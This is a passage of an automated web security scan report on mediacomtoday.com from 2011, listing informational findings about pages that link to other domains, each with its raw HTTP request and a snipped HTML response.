<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/29.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.americanwebinc.com/AW_Flip_Books/Pause/Issue_15/index.html" title="Pause"><img src="/cmsimages/Pause_promo.jpg" alt="Pause" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.25. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=37 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=36
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313407796026; dslv=1313407796026; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 11:58:17 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 133295
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=38" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;6101b50f;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;a5152b80;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/26.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" onclick="Syn.Tracking.tl(this, 'o', 'ufc133');" href="http://www.ufc.com/event/UFC133#/fight" title="UFC 133"><img src="/cmsimages/UFC133_promo.jpg" alt="UFC 133" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.26. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=23 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=22
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313383360709; dslv=1313383360710; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 05:11:09 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 134146
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=24" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;d73f3adc;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;75c8f93b;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/26.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" onclick="Syn.Tracking.tl(this, 'o', 'ufc133');" href="http://www.ufc.com/event/UFC133#/fight" title="UFC 133"><img src="/cmsimages/UFC133_promo.jpg" alt="UFC 133" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.27. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=25 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=24
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313386850394; dslv=1313386850394; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 06:09:12 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 133594
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=26" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;e8bde689;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;278980e0;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/26.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.mediacomcable.com/internet_security.html" title="CA Internet Security"><img src="/cmsimages/CA_promo.jpg" alt="CA Internet Security" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.28. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=7 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313355428797; dslv=1313355428798; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 21:25:52 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 134942
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=8" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;ad4904e8;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;c1369f1e;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/30.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.americanwebinc.com/AW_Flip_Books/Pause/Issue_15/index.html" title="Pause"><img src="/cmsimages/Pause_promo.jpg" alt="Pause" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.29. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=17 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=16
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313372886074; dslv=1313372886075; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 02:16:04 GMT
Server: Apache
